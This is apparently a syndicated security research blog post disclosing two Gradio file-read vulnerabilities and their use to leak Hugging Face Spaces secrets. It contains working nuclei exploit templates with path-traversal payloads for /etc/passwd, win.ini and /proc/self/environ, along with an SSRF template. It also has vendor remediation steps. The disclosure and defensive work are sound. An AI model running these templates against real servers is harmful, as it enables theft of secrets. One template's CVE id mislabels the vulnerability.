On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.
This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.
Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities have long been patched, these old vulnerabilities were, up until recently, still exploitable on the Spaces platform for apps running with an outdated Gradio version.
This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.
Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.
Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.
A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit. Docker, or static HTML.
Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.
Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ
pseudo-file.
CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file
endpoint. This endpoint is supposed to only serve files stored within a Gradio temporary directory. However we found that the check for making sure a requested file was contained within the temporary directory was flawed.
The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload
endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../
or %2e%2e%2f
sequence.
To read environment variables, one can request the /proc/self/environ
pseudo-file using a HTTP Range header:
Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.
Below is a nuclei template for testing this vulnerability:
id: CVE-2023-51449
info:
name: CVE-2023-51449
author: nvn1729
severity: high
description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
reference:
- https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
classification:
cvss-score: 7.5
cve-id: CVE-2024-51449
tags: cve2024, cve, gradio, lfi
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
a
-----------------------------250033711231076532771336998311--
- |
GET /file={{download_path}}{{path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\\[\"(.+)okmijnuhbygv\"\\]"
payloads:
path:
- ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
- ../../../../../../../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- type: status
status:
- 200
CVE-2024-1561 arises from an input validation flaw in the component_server
API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:
On line 702, an arbitrary user-specified function is invoked against the specified component object.
For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache
function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file
endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ
pseudo-file containing environment variables.
In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed
can be invoked on most Component objects.
In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed
can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.
There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.
The following nuclei templates can be used to test for CVE-2024-1561.
File read against Gradio 4.3-4.12:
id: CVE-2024-1561-4x
info:
name: CVE-2024-1561-4x
author: nvn1729
severity: high
description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
reference:
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
classification:
cvss-score: 7.5
cve-id: CVE-2024-1561
tags: cve2024, cve, gradio, lfi
http:
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\"?([^\"]+)"
payloads:
path:
- c:\\windows\\win.ini
- /etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- type: status
status:
- 200
File read against Gradio 3.47 – 3.50.2:
id: CVE-2024-1561-3x
info:
name: CVE-2024-1561-3x
author: nvn1729
severity: high
description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
reference:
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
classification:
cvss-score: 7.5
cve-id: CVE-2024-1561
tags: cve2024, cve, gradio, lfi
http:
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\"?([^\"]+)"
attack: clusterbomb
payloads:
fuzz_component_id:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
path:
- c:\\windows\\win.ini
- /etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- type: status
status:
- 200
Exploiting the SSRF against Gradio 3.47-3.50.2:
id: CVE-2024-1561-3x-ssrf
info:
name: CVE-2024-1561-3x-ssrf
author: nvn1729
severity: high
description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
reference:
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
classification:
cvss-score: 7.5
cve-id: CVE-2024-1561
tags: cve2024, cve, gradio, lfi
http:
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}
- |
GET /file={{download_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\"?([^\"]+)"
payloads:
fuzz_component_id:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- <html><head></head><body>[a-z0-9]+</body></html>
If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:
As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ
file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user configured secrets and variables are shown in bold.
PATH=REDACTED^@HOSTNAME=REDACTED@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^^@REDACTED
When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.
And the vulnerabilities we had reported were still exploitable. We then the checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.
It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md
controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.
We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:
Hugging Face configured new rules in their “web application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.
Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.
Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.
We appreciate Hugging Face’s prompt response in improving their security posture.
In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.
To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up til recently.
To upgrade a Gradio Space, a user can visit the README.md
file in their Space and click “Upgrade”, as shown below:
Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.
While Hugging Face did harden their WAF to neutralize exploitation, we caution users from thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.
Finally for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.
The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.
*** This is a Security Bloggers Network syndicated blog from Horizon3.ai authored by Naveen Sunkavally. Read the original post at: https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/